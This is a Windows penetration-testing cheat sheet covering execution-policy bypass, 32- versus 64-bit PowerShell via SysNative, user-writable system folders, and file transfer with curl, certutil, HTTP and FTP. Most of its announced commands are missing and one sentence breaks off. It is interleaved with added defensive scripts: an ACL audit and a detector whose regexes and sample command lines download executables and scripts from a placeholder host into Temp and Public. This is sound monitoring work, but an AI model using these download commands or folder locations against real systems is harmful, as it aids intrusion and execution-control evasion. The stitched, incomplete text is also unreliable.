CLI Tips
Load Powershell Module Over HTTP:
If you don't bypass the execution policy, you won't be able to run external PowerShell scripts. Run PowerShell with the execution policy set to Bypass:
If you're on a 64-bit machine and running a 32-bit Powershell, .
Check in PowerShell:
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
Access 64-bit Powershell at:
C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe
This path exists for 32-bit processes (it is an alias provided by the WOW64 file-system redirector) even though you won't see it from a 64-bit process such as Explorer.
Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.
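The check described above, as an added example that is not part of the original page: it reports the OS and process bitness, resolves which powershell.exe is the native 64-bit one (the SysNative alias from a 32-bit process, plain System32 from a 64-bit one), and then launches that executable once to confirm it really reports itself as 64-bit. The function name Get-PowerShellBitness is my own choice.

```powershell
# Added example, not from the original page: report whether this PowerShell
# process is a 32-bit process on a 64-bit OS and, if so, resolve the native
# 64-bit powershell.exe through the SysNative alias described above.
function Get-PowerShellBitness {
    $os64   = [Environment]::Is64BitOperatingSystem
    $proc64 = [Environment]::Is64BitProcess

    # SysNative is a virtual folder that the WOW64 file-system redirector exposes
    # only to 32-bit processes on a 64-bit OS; 64-bit processes do not see it.
    $sysNative = Join-Path $env:windir 'SysNative\WindowsPowerShell\v1.0\powershell.exe'
    $system32  = Join-Path $env:windir 'System32\WindowsPowerShell\v1.0\powershell.exe'

    $native = $null
    if ($os64 -and -not $proc64) {
        $native = $sysNative   # 32-bit process on a 64-bit OS: must go through the alias
    } elseif ($os64) {
        $native = $system32    # already a 64-bit process: System32 is the real folder
    }

    [pscustomobject]@{
        Is64BitOS             = $os64
        Is64BitProcess        = $proc64
        Wow64Redirected       = ($os64 -and -not $proc64)
        SysNativeAliasVisible = (Test-Path -LiteralPath $sysNative)
        Native64BitPowerShell = $native
    }
}

$info = Get-PowerShellBitness
$info | Format-List

# Confirm by asking the resolved executable which bitness it actually runs as;
# it should print True on a 64-bit OS.
if ($info.Native64BitPowerShell) {
    & $info.Native64BitPowerShell -NoProfile -NonInteractive -Command '[Environment]::Is64BitProcess'
}
```

Run it from both a 32-bit and a 64-bit PowerShell on the same 64-bit host: only the 32-bit one reports Wow64Redirected and SysNativeAliasVisible as True, which is exactly the case where the bare name powershell.exe resolves to the 32-bit copy in SysWOW64.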
You can do it like this, but you need to press enter to get the output.
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
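The directories listed above are the usual Windows locations that are writable by ordinary users. As an added example that is not part of the original page, this script audits them from the hardening side: it walks each directory's ACL and reports any Allow entry that grants create or write rights to a broad principal (Everyone, Users, Authenticated Users, INTERACTIVE). The function name Get-BroadWritableDirectory and the list of principals are my own choices.

```powershell
# Added example, not from the original page: audit the directories listed above
# for ACEs that grant write access to broad, low-privilege principals.
function Get-BroadWritableDirectory {
    param([Parameter(Mandatory)][string[]]$Path)

    # Principals that effectively mean "any logged-on user" (assumption: these
    # are the ones worth flagging; adjust for your environment).
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

    # Rights that allow creating content in a folder. CreateFiles shares its bit
    # with WriteData and CreateDirectories with AppendData, so both are covered.
    $writeBits = [int]([System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                       [System.Security.AccessControl.FileSystemRights]::CreateDirectories)
    $genericWrite = 0x40000000   # GENERIC_WRITE: only ever shows up as a raw number
    $genericAll   = 0x10000000   # GENERIC_ALL

    foreach ($dir in $Path) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        try {
            $acl = Get-Acl -LiteralPath $dir -ErrorAction Stop
        } catch {
            Write-Warning "Cannot read ACL of ${dir}: $($_.Exception.Message)"
            continue
        }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($broad -notcontains $ace.IdentityReference.Value) { continue }
            # InheritOnly ACEs apply to children, not to the folder itself.
            if (($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0) { continue }
            $rights = [int]$ace.FileSystemRights
            if (($rights -band $writeBits) -or ($rights -band $genericWrite) -or ($rights -band $genericAll)) {
                [pscustomobject]@{
                    Path     = $dir
                    Identity = $ace.IdentityReference.Value
                    Rights   = $ace.FileSystemRights
                }
            }
        }
    }
}

# The directories from the list above, built from environment variables so the
# audit also works when Windows is not installed on C:.
$candidates = @(
    "$env:windir\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:windir\System32\spool\drivers\color",
    "$env:windir\Tasks",
    "$env:windir\tracing",
    "$env:windir\Temp",
    "$env:SystemDrive\Users\Public"
)
Get-BroadWritableDirectory -Path $candidates | Format-Table -AutoSize
```

The script only reports Allow entries and ignores Deny entries, so treat its output as a shortlist to confirm rather than an effective-permissions calculation. The defensive relevance of these folders is that AppLocker's default rules permit execution from anywhere under %WINDIR%, so user-writable subfolders there are the standard reason to add explicit exception rules for them and to watch file creation in them.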
Start an HTTP server on your Linux machine:
Download file over HTTP using curl (in case it's installed in Powershell):
Download file using certutil:
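From the monitoring side, the downloads just described leave a command line in process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled). As an added example that is not part of the original page, this function matches such command lines against a few patterns for curl, certutil and PowerShell web downloads and runs them over a handful of constructed sample lines; the function name Find-HttpDownloadCommand, the rule names and the sample lines are my own.

```powershell
# Added example, not from the original page: flag process command lines that
# fetch content over HTTP with the tools discussed above.
function Find-HttpDownloadCommand {
    param([Parameter(Mandatory)][string[]]$CommandLine)

    # Rule names and patterns are my own; -match is case-insensitive by default.
    $rules = @(
        @{ Name = 'certutil-urlcache';      Regex = '\bcertutil(\.exe)?\b.*[-/]urlcache' },
        @{ Name = 'curl-download-to-file';  Regex = '\bcurl(\.exe)?\b.*https?://.*(\s-o\s|\s-O\b|--output\b)' },
        @{ Name = 'powershell-web-download'; Regex = '\bpowershell(\.exe)?\b.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)' },
        @{ Name = 'powershell-execpolicy-bypass'; Regex = '\bpowershell(\.exe)?\b.*-(ep|ex|exec|executionpolicy)\s+bypass' }
    )

    foreach ($line in $CommandLine) {
        foreach ($rule in $rules) {
            if ($line -match $rule.Regex) {
                [pscustomobject]@{ Rule = $rule.Name; CommandLine = $line }
            }
        }
    }
}

# Constructed sample command lines, not real telemetry. 10.0.0.5 is a placeholder.
$sample = @(
    'certutil.exe -urlcache -f http://10.0.0.5/tool.exe C:\Windows\Temp\tool.exe',
    'curl.exe http://10.0.0.5/tool.exe -o C:\Users\Public\tool.exe',
    'certutil.exe -hashfile C:\Windows\System32\notepad.exe SHA256',
    'curl.exe https://example.com/',
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\maintenance.ps1',
    'powershell.exe -NoProfile -Command "Invoke-WebRequest http://10.0.0.5/m.ps1 -OutFile C:\Windows\Temp\m.ps1"'
)
Find-HttpDownloadCommand -CommandLine $sample | Format-Table -AutoSize
```

Of the six samples, the hashfile and plain curl lines produce no hit; the other four each match one rule. To run this against live data, feed in the CommandLine field from Sysmon Event ID 1 (Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational') instead of the constructed array, and expect to tune the PowerShell rules, since legitimate administration scripts also use Invoke-WebRequest and the Bypass policy.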
Start an FTP server on your Linux machine:
If you don't specify a username and password, you can log in as user anonymous with no password.